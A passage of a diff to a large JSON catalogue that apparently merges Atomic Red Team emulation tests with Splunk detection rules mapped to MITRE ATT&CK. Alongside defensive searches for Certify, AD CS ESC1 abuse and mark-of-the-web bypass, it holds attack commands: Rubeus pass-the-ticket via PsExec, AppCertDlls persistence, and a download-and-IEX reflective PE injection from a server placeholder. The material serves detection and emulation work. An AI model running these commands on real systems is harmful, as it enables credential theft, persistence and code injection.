-Force\nNew-Item -ItemType Directory (Split-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" } ], "executor": { "name": "powershell", "elevation_required": true, - "command": "& \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -accepteula \\\\#{target} -w c:\\ -c \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location PathToAtomicsFolder\\..\\ExternalPayloads\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\ticket.kirbi\n& \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" purge " + "command": "& \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -accepteula \\\\#{target} -w c:\\ -c \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location \"PathToAtomicsFolder\\..\\ExternalPayloads\"\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\ticket.kirbi\"\n& \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" purge " } } ] @@ -402484,7 +406648,7 @@ "ls -a >> /tmp/T1083.txt\nif [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > /tmp/T1083.txt; fi;\nfile */* *>> /tmp/T1083.txt\ncat /tmp/T1083.txt 2>/dev/null\nfind . -type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt\nif [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi;\nfind . -type f -iname *.pdf >> /tmp/T1083.txt\ncat /tmp/T1083.txt\nfind . -type f -name \".*\"\n", "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt}\n}\ncat $env:temp\\T1083Test5.txt\n", - "Start-Process ..\\ExternalPayloads\\DirLister.exe\nStart-Sleep -Second 4\nStop-Process -Name \"DirLister\"\n", + "Start-Process \"\\..\\ExternalPayloads\\DirLister.exe\"\nStart-Sleep -Second 4\nStop-Process -Name \"DirLister\"\n", "powershell/collection/file_finder", "powershell/collection/find_interesting_file", "powershell/collection/get_indexed_item", @@ -402646,19 +406810,19 @@ "dirlister_path": { "description": "Path to the DirLister executable ", "type": "string", - "default": "PathToAtomicsFolder..\\ExternalPayloads\\DirLister.exe" + "default": "PathToAtomicsFolder\\..\\ExternalPayloads\\DirLister.exe" } }, "dependency_executor_name": "powershell", "dependencies": [ { "description": "DirLister.exe must exist in the specified path #{dirlister_path}\n", - "prereq_command": "if (Test-Path #{dirlister_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "$parentpath = Split-Path \"#{dirlister_path}\"\nNew-Item -ItemType Directory -Force -Path $parentpath | Out-Null\nInvoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4.zip\nExpand-Archive -Path PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4.zip -DestinationPath PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4 -Force\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4\\* $parentpath -Recurse\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4.zip,PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore\n" + "prereq_command": "if (Test-Path \"#{dirlister_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "$parentpath = Split-Path \"#{dirlister_path}\"\nNew-Item -ItemType Directory -Force -Path $parentpath | Out-Null\nInvoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4.zip\"\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4\" -Force\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4\\*\" \"$parentpath\" -Recurse\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4.zip\",\"PathToAtomicsFolder\\..\\ExternalPayloads\\TDirLister.v2.beta4\" -Recurse -ErrorAction Ignore\n" } ], "executor": { - "command": "Start-Process #{dirlister_path}\nStart-Sleep -Second 4\nStop-Process -Name \"DirLister\"\n", + "command": "Start-Process \"#{dirlister_path}\"\nStart-Sleep -Second 4\nStop-Process -Name \"DirLister\"\n", "name": "powershell" } } @@ -406107,7 +410271,7 @@ } ], "command_list": [ - "\\T1055.004\\bin\\T1055.exe\n" + "\"\\T1055.004\\bin\\T1055.exe\"\n" ], "commands": [], "queries": [], @@ -406137,12 +410301,12 @@ "dependencies": [ { "description": "#{exe_binary} must be exist on system.\n", - "prereq_command": "if (Test-Path #{exe_binary}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe\" -OutFile \"#{exe_binary}\"\n" + "prereq_command": "if (Test-Path \"#{exe_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{exe_binary}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe\" -OutFile \"#{exe_binary}\"\n" } ], "executor": { - "command": "#{exe_binary}\n", + "command": "\"#{exe_binary}\"\n", "name": "command_prompt" } } @@ -408576,7 +412740,7 @@ } ], "command_list": [ - "Copy-Item \\T1546.009\\bin\\AtomicTest.dll C:\\Users\\Public\\AtomicTest.dll -Force\nreg add \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\" /v \"AtomicTest\" /t REG_EXPAND_SZ /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nif($false){Restart-Computer} \n" + "Copy-Item \"\\T1546.009\\bin\\AtomicTest.dll\" C:\\Users\\Public\\AtomicTest.dll -Force\nreg add \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\" /v \"AtomicTest\" /t REG_EXPAND_SZ /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nif($false){Restart-Computer} \n" ], "commands": [], "queries": [], @@ -408611,12 +412775,12 @@ "dependencies": [ { "description": "File to copy must exist on disk at specified location (#{dll_path})\n", - "prereq_command": "if (Test-Path #{dll_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll\" -OutFile \"#{dll_path}\"\n" + "prereq_command": "if (Test-Path \"#{dll_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll\" -OutFile \"#{dll_path}\"\n" } ], "executor": { - "command": "Copy-Item #{dll_path} C:\\Users\\Public\\AtomicTest.dll -Force\nreg add \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\" /v \"AtomicTest\" /t REG_EXPAND_SZ /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nif(#{reboot}){Restart-Computer} \n", + "command": "Copy-Item \"#{dll_path}\" C:\\Users\\Public\\AtomicTest.dll -Force\nreg add \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\" /v \"AtomicTest\" /t REG_EXPAND_SZ /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nif(#{reboot}){Restart-Computer} \n", "cleanup_command": "reg delete \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\" /v \"AtomicTest\" /f\nRemove-Item C:\\Users\\Public\\AtomicTest.dll -Force\nRemove-Item C:\\Users\\Public\\AtomicTest.txt -Force\n", "name": "powershell", "elevation_required": true @@ -410423,6 +414587,314 @@ } ], "possible_detections": [ + { + "name": "Detect Certify Command Line Arguments", + "description": "The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"* find *\",\"* auth *\",\"* request *\",\"* req *\",\"* download *\",) AND Processes.process IN (\"* /vulnerable*\",\"* /enrolleeSuppliesSubject *\",\"* /json /outfile*\",\"* /ca*\", \"* -username *\",\"* -u *\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `detect_certify_command_line_arguments_filter`", + "tags": { + "name": "Detect Certify Command Line Arguments", + "analytic_story": [ + "Windows Certificate Services", + "Ingress Tool Transfer" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Command And Control" + ], + "message": "Certify/Certipy arguments detected on $dest$.", + "mitre_attack_id": [ + "T1649", + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "process", + "type": "Process", + "role": [ + "Attacker" + ] + }, + { + "name": "process_name", + "type": "Process Name", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 90, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + } + ] + } + }, + { + "name": "Detect Certify With PowerShell Script Block Logging", + "description": "The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions.", + "search": "`powershell` EventCode=4104 (ScriptBlockText IN (\"*find *\") AND ScriptBlockText IN (\"* /vulnerable*\",\"* -vulnerable*\",\"* /enrolleeSuppliesSubject *\",\"* /json /outfile*\")) OR (ScriptBlockText IN (,\"*auth *\",\"*req *\",) AND ScriptBlockText IN (\"* -ca *\",\"* -username *\",\"* -u *\")) OR (ScriptBlockText IN (\"*request *\",\"*download *\") AND ScriptBlockText IN (\"* /ca:*\")) | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command Values(OpCode) as reason values(Path) as file_name values(UserID) as user by _time Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval file_name = case(isnotnull(file_name),file_name,true(),\"unknown\") | eval signature = substr(command,0,256) | rename Computer as dest,EventCode as signature_id | `detect_certify_with_powershell_script_block_logging_filter`", + "tags": { + "name": "Detect Certify With PowerShell Script Block Logging", + "analytic_story": [ + "Windows Certificate Services", + "Malicious PowerShell" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "Certify arguments through PowerShell detected on $dest$.", + "mitre_attack_id": [ + "T1649", + "T1059", + "T1059.001" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "command", + "type": "Process", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 90, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + }, + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, { "name": "Steal or Forge Authentication Certificates Behavior Identified", "description": "This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics related to Windows Certificate Services analytic story that are triggered within a specified time frame, which may indicate a potential attack in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.", @@ -410737,6 +415209,100 @@ ] } }, + { + "name": "Windows Steal Authentication Certificates - ESC1 Authentication", + "description": "The following analytic identifies when a suspicious certificate is granted using Active Directory Certificate Services (AD CS) with a Subject Alternative Name (SAN) and then immediately used for authentication. This action alone may not be malicious, however improperly configured certificate templates can be abused to permit privilege escalation and environment compromise due to over permissive settings (AD CS ESC1).", + "search": "`wineventlog_security` EventCode IN (4887) Attributes=\"*SAN:*upn*\" Attributes=\"*CertificateTemplate:*\" | stats count min(_time) as firstTime max(_time) as lastTime values(name) as name values(status) as status values(Subject) as ssl_subject values(SubjectKeyIdentifier) as ssl_hash by Computer, EventCode, Requester, Attributes, RequestId | rex field=Attributes \"(?i)CertificateTemplate:(?[^\\r\\n]+)\" | rex field=Attributes \"(?i)ccm:(?[^\\r\\n]+)\" | rex max_match=10 field=Attributes \"(?i)(upn=(?[^\\r\\n&]+))\" | rex max_match=10 field=Attributes \"(?i)(dns=(?[^\\r\\n&]+))\" | rex field=Requester \"(.+\\\\\\\\)?(?[^\\r\\n]+)\" | rename Attributes as object_attrs, EventCode as signature_id, name as signature, RequestId as ssl_serial, Requester as ssl_subject_common_name | eval user = lower(coalesce(req_user_1,req_user_2)) | join user [ | search `wineventlog_security` EventCode=4768 CertThumbprint=* | rename TargetUserName as user, Computer as auth_dest, IpAddress as auth_src | fields auth_src,auth_dest,user ] | eval src = upper(coalesce(auth_src,req_src)), dest = upper(coalesce(auth_dest,req_dest_1,req_dest_2)), risk_score = 90 | eval flavor_text = case(signature_id==\"4887\", \"User account [\".'user'.\"] authenticated after a suspicious certificate was issued for it by [\".'src_user'.\"] using certificate request ID: \".'ssl_serial') | fields - req_* auth_* | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_steal_authentication_certificates___esc1_authentication_filter`", + "tags": { + "name": "Windows Steal Authentication Certificates - ESC1 Authentication", + "analytic_story": [ + "Windows Certificate Services" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Possible AD CS ESC1 authentication on $dest$", + "mitre_attack_id": [ + "T1649", + "T1550" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "src", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "src_user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "ssl_hash", + "type": "Other", + "role": [ + "Attacker" + ] + }, + { + "name": "ssl_serial", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 90, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, + { + "mitre_attack_id": "T1550", + "mitre_attack_technique": "Use Alternate Authentication Material", + "mitre_attack_tactics": [ + "Defense Evasion", + "Lateral Movement" + ], + "mitre_attack_groups": [] + } + ] + } + }, { "name": "Windows Steal Authentication Certificates Certificate Issued", "description": "The following analytic identifies when a new certificate is issued against the Certificate Services - AD CS. By its very nature this is not malicious, but should be tracked and correlated with other events related to certificates being issued. When the CA issues the certificate, it creates EID 4887 'Certificate Services approved a certificate request and issued a certificate\". The event supplies the requester user context, the DNS hostname of the machine they requested the certificate from, and the time they requested the certificate. The attributes fields in these event commonly has values for CDC, RMD, and CCM which correspond to Client DC, Request Machine DNS name, and Cert Client Machine, respectively.", @@ -411551,8 +416117,8 @@ "dependencies": [ { "description": "Sharpview.exe must exist on disk at specified location (#{SharpView})\n", - "prereq_command": "if (Test-Path #{SharpView}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest #{SharpView_url} -OutFile \"#{SharpView}\"\n" + "prereq_command": "if (Test-Path \"#{SharpView}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{SharpView}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest #{SharpView_url} -OutFile \"#{SharpView}\"\n" } ], "executor": { @@ -412455,7 +417021,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -412471,7 +417037,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -413062,8 +417628,8 @@ "dependencies": [ { "description": "T1553.005.iso must exist on disk at specified location (#{path_of_iso})\n", - "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile \"#{path_of_iso}\"\n" + "prereq_command": "if (Test-Path \"#{path_of_iso}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{path_of_iso}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile \"#{path_of_iso}\"\n" } ], "executor": { @@ -413090,8 +417656,8 @@ "dependencies": [ { "description": "FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})\n", - "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile \"#{path_of_iso}\"\n" + "prereq_command": "if (Test-Path \"#{path_of_iso}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{path_of_iso}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile \"#{path_of_iso}\"\n" } ], "executor": { @@ -413151,8 +417717,8 @@ "dependencies": [ { "description": "AllTheThings.iso must exist on disk at specified location (#{path_of_iso})\n", - "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile \"#{path_of_iso}\"\n" + "prereq_command": "if (Test-Path \"#{path_of_iso}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{path_of_iso}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile \"#{path_of_iso}\"\n" } ], "executor": { @@ -413313,6 +417879,63 @@ "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" ] + }, + { + "name": "Windows Mark Of The Web Bypass", + "description": "The following analytic identifies a suspicious process that delete mark-of-the-web data stream. This technique has been observed in various instances of malware and adversarial activities aimed at circumventing security restrictions within the Windows Operating System, particularly pertaining to files downloaded from the internet. An example of this scenario is demonstrated by Ave Maria RAT, which attempts to delete this data stream as a means to evade such restrictions.", + "search": "`sysmon` EventCode=23 TargetFilename = \"*:Zone.Identifier\" | stats min(_time) as firstTime max(_time) as lastTime count by user EventCode Image TargetFilename ProcessID Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_mark_of_the_web_bypass_filter`", + "tags": { + "name": "Windows Mark Of The Web Bypass", + "analytic_story": [ + "Warzone RAT" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "A mark-of-the-web data stream is deleted on $dest$", + "mitre_attack_id": [ + "T1553.005" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 49, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1553.005", + "mitre_attack_technique": "Mark-of-the-Web Bypass", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT29", + "TA505" + ] + } + ] + } } ], "external_reference": [ @@ -418529,13 +423152,54 @@ } ], "command_list": [ + "Start-Process \"\\T1055.002\\bin\\RedInjection.exe\"\nStart-Sleep -Seconds 7\nGet-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose", "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n", "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n" ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1055.002/T1055.002.yaml", + "name": "Atomic Red Team Test - Process Injection: Portable Executable Injection", + "content": { + "attack_technique": "T1055.002", + "display_name": "Process Injection: Portable Executable Injection", + "atomic_tests": [ + { + "name": "Portable Executable Injection", + "auto_generated_guid": "578025d5-faa9-4f6d-8390-aae739d503e1", + "description": "This test injects a portable executable into a remote Notepad process memory using Portable Executable Injection and base-address relocation techniques. When successful, a message box will appear with the title \"Warning\" and the content \"Atomic Red Team\" after a few seconds.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "PE binary", + "type": "path", + "default": "PathToAtomicsFolder\\T1055.002\\bin\\RedInjection.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Portable Executable to inject must exist at specified location (#{exe_binary})\n", + "prereq_command": "if (Test-Path \"#{exe_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{exe_binary}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.002/bin/RedInjection.exe\" -OutFile \"#{exe_binary}\"\n" + } + ], + "executor": { + "command": "Start-Process \"#{exe_binary}\"\nStart-Sleep -Seconds 7\nGet-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "cleanup_command": "Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "name": "powershell", + "elevation_required": true + } + } + ] + } + } + ], "possible_detections": [ { "technique_id": "T1055.002", @@ -418702,13 +423366,6 @@ "DE.AE" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -418776,7 +423433,8 @@ "name": "Windows Process 